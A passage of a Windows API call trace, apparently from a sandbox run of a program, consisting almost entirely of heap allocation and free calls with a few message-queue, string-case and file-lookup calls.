Size=0x8) returned 0x43e2130 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9a10 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0111.187] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0111.187] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0111.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0111.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0111.187] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4bcbc30, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x7503b690, ftLastAccessTime.dwHighDateTime=0x1d5e1dc, ftLastWriteTime.dwLowDateTime=0x7503b690, ftLastWriteTime.dwHighDateTime=0x1d5e1dc, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="xJgB9.wav", cAlternateFileName="")) returned 0x41ac200 [0111.188] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0111.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0111.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0111.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0111.188] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0111.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0111.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0111.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c08 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0111.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0111.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0111.189] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0111.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0111.189] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0111.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0111.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0111.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0111.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0111.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2170 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0111.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cb0 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0111.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0111.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0111.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0111.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0111.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0111.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0111.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0111.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0111.191] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0111.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0111.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.194] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0111.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0111.195] RtlAllocateHeap 